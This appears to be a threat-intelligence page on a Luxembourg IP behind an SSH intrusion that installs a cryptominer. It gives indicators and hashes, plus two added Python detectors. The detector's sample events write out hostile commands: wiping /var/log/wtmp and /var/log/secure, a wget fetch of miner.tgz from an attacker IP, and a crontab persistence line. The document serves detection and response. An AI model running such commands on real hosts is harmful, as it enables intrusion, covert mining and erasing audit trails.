IP Address: 94.242.246.24 (Previously Malicious)



This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role: Attacker

Services Targeted: SSH

Tags: Download Operation, Log Tampering, Download File, Malicious File, 9 Shell Commands, Outgoing Connection, SSH, Download and Allow Execution, Successful SSH Login, Scheduled Task Creation, HTTP, Human

Connect Back Servers

Hostnames: zlha65umg7qmprg6.onion.to, startdedicated.de, xphkxaiz233pjoto.onion.cab, 6ppk2oii4hsweqb7.onion.link, tqz3y4w3eq4wi2ay.onion.cab, qcuifb2klqqkwc5q.onion.cab, 6ppk2oii4hsweqb7.onion.to, w4gfzjunvynjhpj6.onion.link

The .onion.to, .onion.cab and .onion.link suffixes are Tor2web gateways, so these entries are Tor hidden services that the malware reached over the clearnet without a local Tor client; blocking the gateway domains, not just the individual names, is the practical control.

IP addresses: 62.138.11.6, 192.36.27.5, 103.198.0.2, 81.4.122.134, 185.100.85.150

Basic Information

IP Address: 94.242.246.24

Domain: -

ISP: root SA

Country: Luxembourg

WHOIS

Created Date: -

Updated Date: -

Organization: -

First seen in Guardicore Centra: 2017-06-20

Last seen in Guardicore Centra: 2017-08-20

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

Successful SSH Login: A user logged in using SSH with the following credentials: root / **** - Authentication policy: White List

Successful SSH Login: A user logged in using SSH with the following credentials: root / **** - Authentication policy: Correct Password

Log Tampering: Log file tampering detected from /bin/bash on the following logs: /var/log/secure, /var/log/lastlog and /var/log/wtmp

Outgoing Connection: Process /usr/bin/wget generated outgoing network traffic to 81.4.122.134:80

Download File: /root/miner.tgz was downloaded

Download and Allow Execution: The file /root/.x was downloaded and granted execution privileges

Download and Allow Execution: The file /root/.x/h32 was downloaded and granted execution privileges

Download and Allow Execution: The file /root/.x/run was downloaded and granted execution privileges

Download and Allow Execution: The file /root/.x/bash was downloaded and granted execution privileges

Download and Allow Execution: The file /root/.x/h64 was downloaded and granted execution privileges

Download and Allow Execution: The file /root/.x/a was downloaded and granted execution privileges

Download and Allow Execution: The file /root/.x/upd was downloaded and granted execution privileges

Malicious File: /root/.x/bash was identified as malicious by YARA according to rules: Crypto Signatures

Malicious File: /root/.x/h64 was identified as malicious by YARA according to rules: Malw Miscelanea Linux and Apt Eqgrp Apr17

Malicious File: /root/.x/h32 was identified as malicious by YARA according to rules: Maldoc Somerules
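A detection pass over the chain above, added here as an example and not part of the Guardicore page or product. It runs a handful of rules (root password login over SSH, truncation or deletion of the logs named above, a wget/curl fetch from a bare IP address, chmod granting execute under a hidden directory, crontab persistence for the Scheduled Task Creation tag) over a constructed event list that mirrors the flow, labels hits with the page's own event names, and grades how much of the login, cover-tracks, download, execute, persist chain was seen. The event schema, the function and rule names, the extra Debian-style log paths and the URL path after the IP in the sample are assumptions.

```python
import re

# Logs the page reports as tampered, plus their Debian-family equivalents (assumption).
SENSITIVE_LOGS = [
    "/var/log/secure", "/var/log/lastlog", "/var/log/wtmp",
    "/var/log/btmp", "/var/log/auth.log", "/var/log/messages",
]
_LOG_ALT = "|".join(re.escape(p) for p in SENSITIVE_LOGS)
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
IPV4_RE = re.compile(IPV4)

# Truncation or deletion of a sensitive log: "> path", "cat /dev/null > path",
# "rm path", "truncate -s 0 path", "shred path". Reads (tail, grep) do not match.
LOG_TAMPER_RE = re.compile(
    r"(?:>\s*|\b(?:rm|shred|unlink|truncate)\b[^;&|]*?\s)(?:" + _LOG_ALT + r")\b")
# wget/curl fetching from a bare IPv4 literal (the page shows wget to 81.4.122.134:80).
BARE_IP_FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;&|]*https?://" + IPV4 + r"(?::\d+)?/")
# chmod granting execute (+x, or an octal mode with the owner execute bit) on a file
# under a hidden directory such as /root/.x/.
HIDDEN_EXEC_RE = re.compile(
    r"\bchmod\b[^;&|]*?(?:\+x|\b[0-7]?[1357][0-7]{2}\b)[^;&|]*?(/(?:[^/\s]+/)*\.[^/\s]+/)")
# crontab edits or writes into the cron spool/config directories.
CRON_RE = re.compile(r"\bcrontab\b|/etc/cron(?:tab|\.d|\.hourly|\.daily)?\b|/var/spool/cron\b")

CMD_RULES = [
    ("Log Tampering", LOG_TAMPER_RE),
    ("Download File", BARE_IP_FETCH_RE),
    ("Download and Allow Execution", HIDDEN_EXEC_RE),
    ("Scheduled Task Creation", CRON_RE),
]

# Constructed telemetry mirroring the page's Attack Flow. The schema
# (kind/user/auth/src/cmd/proc/dst/port) is an assumed simplification, not
# Centra's format; the URL path after the IP is also assumed.
SAMPLE_EVENTS = [
    {"kind": "ssh_login", "user": "root", "auth": "password", "src": "94.242.246.24"},
    {"kind": "cmd", "cmd": "cat /dev/null > /var/log/wtmp"},
    {"kind": "cmd", "cmd": "echo > /var/log/secure; echo > /var/log/lastlog"},
    {"kind": "cmd", "cmd": "cd /root && wget -q http://81.4.122.134/miner.tgz"},
    {"kind": "net", "proc": "/usr/bin/wget", "dst": "81.4.122.134", "port": 80},
    {"kind": "cmd", "cmd": "tar xzf miner.tgz && chmod +x /root/.x/h32 /root/.x/h64 /root/.x/run"},
    {"kind": "cmd", "cmd": "(crontab -l; echo '* * * * * /root/.x/upd') | crontab -"},
]


def analyze(events):
    """Return one finding per rule hit, labelled with the page's event names."""
    findings, seen = [], set()
    for i, ev in enumerate(events):
        kind = ev.get("kind")
        if kind == "ssh_login":
            if ev.get("user") == "root" and ev.get("auth") == "password":
                findings.append({"event": i, "label": "Successful SSH Login",
                                 "detail": f"root password login from {ev.get('src', '?')}"})
        elif kind == "net":
            proc = ev.get("proc", "").rsplit("/", 1)[-1]
            if proc in ("wget", "curl") and IPV4_RE.fullmatch(ev.get("dst", "")):
                findings.append({"event": i, "label": "Outgoing Connection",
                                 "detail": f"{proc} -> {ev['dst']}:{ev.get('port', '?')}"})
        elif kind == "cmd":
            cmd = ev.get("cmd", "")
            for label, rx in CMD_RULES:
                for m in rx.finditer(cmd):
                    key = (i, label, m.group(0).strip())
                    if key in seen:          # e.g. "crontab" appearing twice in one line
                        continue
                    seen.add(key)
                    findings.append({"event": i, "label": label, "detail": key[2]})
    return findings


# Stages of the chain on the page: login, cover tracks, download, execute, persist.
CHAIN_STAGES = ["Successful SSH Login", "Log Tampering", "Download File",
                "Download and Allow Execution", "Scheduled Task Creation"]


def chain_severity(findings):
    """Grade by how many distinct chain stages the findings cover."""
    labels = {f["label"] for f in findings}
    hit = sum(stage in labels for stage in CHAIN_STAGES)
    if hit >= 4:
        return "high"
    if hit >= 2:
        return "medium"
    return "low" if hit else "none"


if __name__ == "__main__":
    hits = analyze(SAMPLE_EVENTS)
    for h in hits:
        print(f"event {h['event']}: {h['label']} ({h['detail']})")
    print("chain severity:", chain_severity(hits))
```

The per-rule hits are deliberately low-confidence on their own (a `crontab -l` or a `wget` from an IP is normal on many hosts); the severity comes from seeing several stages on one host in one session, which is what makes the page's sequence distinctive.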

Associated Files

/var/tmp/systemd-private-484004451d0046639858c0420ad0891c-systemd-timesyncd.service/security

SHA256: 7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf

838583 bytes

/var/tmp/.ssh/h32

SHA256: 45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161

15125 bytes

/tmp/r9MAa0jfZD8rR

SHA256: bb8b611d3074b15a9fbe9967c0dd46346cd9f815bae60b3d92678afdd428064e

4390176 bytes

/tmp/cqjzSiU73By

SHA256: e62105ab36579f0e55c397d63f757e6a4320e6c7713ccbdfff883e9f53ffdebf

4390176 bytes

/tmp/Om0whdoAsk

SHA256: 9671e0e757c98f22297ebb4a51fb49ef2ec60a2d52516e5d1368b8ffc1ea1675

4390176 bytes

/tmp/F7IqVO5f

SHA256: b8d4721ea987582cf08147fd37e6acced139395c5f393dd577a95f7c0f51754b

4390176 bytes

/tmp/eBWWDqnvbdDLkrf

SHA256: 50d60a26c70b45c368acbc11050bbd1a045a782be90fe849243fa5051182a321

4390176 bytes

/tmp/c3pGxWt3a8Roat

SHA256: 67bb57aeaa27949db98161ed13465fbe31921f274279261bd7f24c6c557e945a

4390176 bytes

/var/tmp/.bash/bash

SHA256: d9791f4dfd903bf3c7c5258ac4ae92df11fc37c3b1749e15f173c1aeb6fafb67

3876568 bytes

/tmp/4WQYOZwkbHwR23N

SHA256: 0e306cbf91ea3c59cec7d09ad4cc7213c8536dc453cfc47b50c6f9994fcdbabf

4390176 bytes

/usr/local/games/.x/run

SHA256: b2c51dea29f151d67d1e43b8d1d47e425f81b761f20c2cc37c7163d549b04816

420 bytes

/usr/local/games/miner.tgz

SHA256: 47157b82727beb3da031a1a2c84ceb694d9d22169e0b0f2d1993ba5962d27077

1753750 bytes

/root/.x/upd

SHA256: 586266b559039519e858f14059ee31f328c5a1a407cfee429801cdf0a7f90719

160 bytes

/tmp/PPE7btu7fOrN

SHA256: 7d915f35c60fbe29055582c29b442dae9f8b99fdc0c5b8c1d629823e43dba66b

4390176 bytes

/tmp/vQPbEk9QUG2WV

SHA256: b1dc61633ecf6bb9e5e67e8edab0eda14c0892fae084f1c8f130d4fe3bc7709d

4390176 bytes

/tmp/03OiHx7W

SHA256: 3e69cde0c1a707090c3ee05e603153c21de04e1e172631629e0f0165a612eefe

4390176 bytes
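A filesystem sweep for the drops listed above, added here as an example and not Guardicore's code. The SHA256 set and the sizes are copied from the list; nine of the /tmp files share a size of 4390176 bytes while every hash differs, so a hash-only sweep is brittle and the scanner treats a size match only as a weak secondary signal, adding two behavioural checks drawn from the paths on the page: an executable under a hidden directory (/root/.x, /var/tmp/.bash, /usr/local/games/.x) and an executable with a random-looking name sitting directly in /tmp or /var/tmp. The default scan roots, the function names, the hashing size cap and the constructed sample file created by run_demo() are assumptions.

```python
import hashlib
import os
import re
import stat
import tempfile

# SHA256 values copied from the Associated Files list on this page.
IOC_SHA256 = {
    "7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf",
    "45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161",
    "bb8b611d3074b15a9fbe9967c0dd46346cd9f815bae60b3d92678afdd428064e",
    "e62105ab36579f0e55c397d63f757e6a4320e6c7713ccbdfff883e9f53ffdebf",
    "9671e0e757c98f22297ebb4a51fb49ef2ec60a2d52516e5d1368b8ffc1ea1675",
    "b8d4721ea987582cf08147fd37e6acced139395c5f393dd577a95f7c0f51754b",
    "50d60a26c70b45c368acbc11050bbd1a045a782be90fe849243fa5051182a321",
    "67bb57aeaa27949db98161ed13465fbe31921f274279261bd7f24c6c557e945a",
    "d9791f4dfd903bf3c7c5258ac4ae92df11fc37c3b1749e15f173c1aeb6fafb67",
    "0e306cbf91ea3c59cec7d09ad4cc7213c8536dc453cfc47b50c6f9994fcdbabf",
    "b2c51dea29f151d67d1e43b8d1d47e425f81b761f20c2cc37c7163d549b04816",
    "47157b82727beb3da031a1a2c84ceb694d9d22169e0b0f2d1993ba5962d27077",
    "586266b559039519e858f14059ee31f328c5a1a407cfee429801cdf0a7f90719",
    "7d915f35c60fbe29055582c29b442dae9f8b99fdc0c5b8c1d629823e43dba66b",
    "b1dc61633ecf6bb9e5e67e8edab0eda14c0892fae084f1c8f130d4fe3bc7709d",
    "3e69cde0c1a707090c3ee05e603153c21de04e1e172631629e0f0165a612eefe",
}
# Sizes from the same list; 4390176 recurs across nine differently-hashed /tmp drops.
IOC_SIZES = {838583, 15125, 4390176, 3876568, 420, 1753750, 160}
# Directories the page shows drops in; used as default scan roots (assumption).
DEFAULT_ROOTS = ["/root", "/tmp", "/var/tmp", "/usr/local/games"]
# Names like r9MAa0jfZD8rR, F7IqVO5f, eBWWDqnvbdDLkrf: 8-15 alphanumerics, no extension.
RANDOM_NAME_RE = re.compile(r"[A-Za-z0-9]{8,15}")
MAX_HASH_BYTES = 64 * 1024 * 1024  # do not hash very large files (assumed cap)


def sha256_of(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def classify(path, st, digest, ioc_hashes):
    """Reasons a regular file resembles one of the page's drops; empty list if none."""
    reasons = []
    if digest is not None and digest in ioc_hashes:
        reasons.append("sha256 IOC match")
    if st.st_size in IOC_SIZES:
        reasons.append(f"size {st.st_size} matches an IOC size")  # weak signal only
    executable = bool(st.st_mode & 0o111)
    parts = path.split(os.sep)
    if executable and any(p.startswith(".") and p not in (".", "..") for p in parts[:-1]):
        reasons.append("executable inside a hidden directory")
    if executable and os.path.dirname(path) in ("/tmp", "/var/tmp") and RANDOM_NAME_RE.fullmatch(parts[-1]):
        reasons.append("executable with random-looking name directly in tmp")
    return reasons


def scan(roots=DEFAULT_ROOTS, ioc_hashes=IOC_SHA256):
    """Walk the roots (symlinks are not followed) and return the files with at least one reason."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                digest = None
                if st.st_size <= MAX_HASH_BYTES:
                    try:
                        digest = sha256_of(path)
                    except OSError:
                        continue
                reasons = classify(path, st, digest, ioc_hashes)
                if reasons:
                    hits.append({"path": path, "size": st.st_size, "sha256": digest, "reasons": reasons})
    return hits


def run_demo():
    """Create a constructed sample (a fake 'h64' under a hidden .x directory) and scan it
    with the page's IOC set alone and again with the sample's own digest added."""
    base = tempfile.mkdtemp(prefix="ioc-demo-")
    hidden = os.path.join(base, ".x")
    os.makedirs(hidden)
    sample = os.path.join(hidden, "h64")
    with open(sample, "wb") as f:
        f.write(b"\x7fELF constructed sample, not the real binary\n")  # constructed content
    os.chmod(sample, 0o755)
    digest = sha256_of(sample)
    return {
        "sample": sample,
        "digest": digest,
        "page_iocs_only": scan([base]),
        "with_sample_hash": scan([base], ioc_hashes=IOC_SHA256 | {digest}),
    }


if __name__ == "__main__":
    for hit in run_demo()["with_sample_hash"]:
        print(hit)
```

Run `scan()` with no arguments on a suspect host to sweep the page's drop directories; a hit with only the size reason deserves a look but not an alert on its own, while a hash match or an executable under a hidden directory in /tmp should be treated as confirmed.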

